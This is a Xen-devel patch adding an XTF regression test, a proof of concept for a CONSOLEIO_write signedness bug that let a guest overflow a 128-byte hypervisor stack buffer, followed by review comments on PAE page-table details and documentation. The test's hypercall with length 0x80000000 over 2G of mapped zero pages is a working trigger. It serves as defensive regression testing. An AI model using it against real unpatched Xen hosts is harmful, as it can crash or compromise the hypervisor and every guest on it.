From patchwork Fri Nov 29 14:35:09 2019
X-Patchwork-Submitter: Andrew Cooper
X-Patchwork-Id: 11267215
9344533 X-Ironport-Server: esa5.hc3370-68.iphmx.com X-Remote-IP: 162.221.158.21 X-Policy: $RELAYED X-IronPort-AV: E=Sophos;i="5.69,257,1571716800"; d="scan'208";a="9344533" From: Andrew Cooper To: Date: Fri, 29 Nov 2019 14:35:09 +0000 Message-ID: <20191129143509.26528-1-andrew.cooper3@citrix.com> X-Mailer: git-send-email 2.11.0 In-Reply-To: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> References: <5766dd2b-2aa7-bafe-56ad-3ea33ddf4591@suse.com> MIME-Version: 1.0 Subject: [Xen-devel] [PATCH XTF] CONSOLEIO_write stack overflow PoC X-BeenThere: xen-devel@lists.xenproject.org X-Mailman-Version: 2.1.23 Precedence: list List-Id: Xen developer discussion List-Unsubscribe: , List-Post: List-Help: List-Subscribe: , Cc: Andrew Cooper Errors-To: xen-devel-bounces@lists.xenproject.org Sender: "Xen-devel" Classify it as an XSA test (which arguably ought to be named 'security'), despite no XSA being issues. Signed-off-by: Andrew Cooper Reviewed-by: Jan Beulich --- docs/all-tests.dox | 2 ++ tests/xsa-consoleio-write/Makefile | 9 +++++ tests/xsa-consoleio-write/main.c | 69 ++++++++++++++++++++++++++++++++++++++ 3 files changed, 80 insertions(+) create mode 100644 tests/xsa-consoleio-write/Makefile create mode 100644 tests/xsa-consoleio-write/main.c diff --git a/docs/all-tests.dox b/docs/all-tests.dox index 50429127..bcf9b7ed 100644 --- a/docs/all-tests.dox +++ b/docs/all-tests.dox @@ -143,6 +143,8 @@ XSA-293 - See @ref test-pv-fsgsbase. @subpage test-xsa-298 - missing descriptor table limit checking in x86 PV emulation. +@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow + @section index-utility Utilities diff --git a/tests/xsa-consoleio-write/Makefile b/tests/xsa-consoleio-write/Makefile new file mode 100644 index 00000000..d189b4de --- /dev/null +++ b/tests/xsa-consoleio-write/Makefile @@ -0,0 +1,9 @@ +include $(ROOT)/build/common.mk + +NAME := xsa-consoleio-write +CATEGORY := xsa +TEST-ENVS := hvm32pae + +obj-perenv += main.o + +include $(ROOT)/build/gen.mk 
diff --git a/tests/xsa-consoleio-write/main.c b/tests/xsa-consoleio-write/main.c new file mode 100644 index 00000000..f10a6256 --- /dev/null +++ b/tests/xsa-consoleio-write/main.c @@ -0,0 +1,69 @@ +/** + * @file tests/xsa-consoleio-write/main.c + * @ref test-xsa-consoleio-write + * + * This issue was discovered before it made it into any released version of + * Xen. Therefore, no XSA or CVE was issued. + * + * A bugfix in Xen 4.13 altered CONSOLEIO_write to tolerate passing NUL + * characters intact, as this is a requirement for various TTY setups. + * + * A signed-ness issue with the length calculation lead to a case where Xen + * will copy between 2 and 4G of guest provided data into a 128 byte object on + * the stack. + * + * @see tests/xsa-consoleio-write/main.c + */ +#include + +const char test_title[] = "CONSOLEIO_write stack overflow PoC"; + +uint8_t zero_page[PAGE_SIZE] __page_aligned_bss; + +/* Have the assembler build an L1/L2 pair mapping zero_page[] many times. */ +asm (".section \".data.page_aligned\", \"aw\";" + ".align 4096;" + + "l1t:" + ".rept 512;" + ".long zero_page + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l1t, . - l1t;" + ".type l1t, @object;" + + "l2t:" + ".rept 512;" + ".long l1t + "STR(PF_SYM(AD, P))", 0;" + ".endr;" + ".size l2t, . - l2t;" + ".type l2t, @object;" + + ".previous;" + ); +extern intpte_t l2t[512]; + +void test_main(void) +{ + /* Map 2G worth of zero_page[] starting from 1G... */ + pae_l3_identmap[1] = pae_l3_identmap[2] = pte_from_virt(l2t, PF_SYM(AD, P)); + + /* + * ... , write those zeros with a length possible to be confused by a + * signed bounds check... + */ + hypercall_console_write(_p(GB(1)), 0x80000000); + + /* ... and if Xen is still alive, it didn't trample over its own stack. */ + + xtf_success("Success: Not vulnerable to CONSOLEIO_write stack overflow\n"); +} + +/* + * Local variables: + * mode: C + * c-file-style: "BSD" + * c-basic-offset: 4 + * tab-width: 4 + * indent-tabs-mode: nil + * End: + */
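Review bot: the new docs/all-tests.dox entry "@subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow" sits in the XSA index without saying that no XSA or CVE was issued, which the commit message and the main.c header both stress; a reader scanning the index will go looking for an advisory that does not exist. Suggest extending the description, e.g. "- CONSOLEIO_write stack overflow (fixed before release, no XSA issued)", so the index carries the same caveat as the test itself.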
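Review bot: the Makefile's "TEST-ENVS := hvm32pae" is correct but unexplained; the test hard-codes PAE page-table layout (8-byte entries built as ".long ..., 0" with a zero upper dword, a PDPT written through pae_l3_identmap[], and 1G-sized L3 slots), so it cannot run in hvm32 without PAE, in PV, or in a 64-bit environment. A one-line comment above TEST-ENVS stating that the PoC depends on PAE L3 slots covering 1G each and on 32-bit physical addresses would stop someone later "fixing" the list to add more environments.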
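Review bot: in test_main() the two new PDPTEs are installed with "pte_from_virt(l2t, PF_SYM(AD, P))", but in PAE paging bits 5-8 of a PDPTE (which includes the Accessed and Dirty bits) are reserved, and the four PDPTEs are only read by the CPU on a CR3 load, not on every walk; please double-check that the write is actually seen by the hypercall path on the environments this runs in, and consider PF_SYM(P) alone plus a CR3 reload after the assignment so that the mapping is unambiguously in effect before hypercall_console_write(_p(GB(1)), 0x80000000) is issued. If the mapping silently does not take effect, the copy fails with an error rather than overflowing, and the test reports "Not vulnerable" on a vulnerable Xen. Minor, in the file header: "A signed-ness issue with the length calculation lead to a case" should read "led to a case".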